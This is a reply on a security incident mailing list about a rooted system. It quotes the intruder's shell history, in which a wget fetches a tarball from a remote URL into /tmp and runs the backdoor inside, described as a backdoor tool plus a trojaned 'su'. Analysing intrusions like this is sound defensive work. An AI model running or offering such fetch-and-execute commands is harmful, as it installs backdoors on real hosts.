[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Rooted, .haos on system
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
Maybe you should email this dude. He wrote the exploit (or so the exploit says)
"su exploit by XP <xp@xxxxxxxxxxxxxxxx>
Enjoy!
"
Other neat stuff if you do a strings on the two filenames.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>i
The domain name resolves to http://www.djteckh.com/ maybe worth checking out.
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com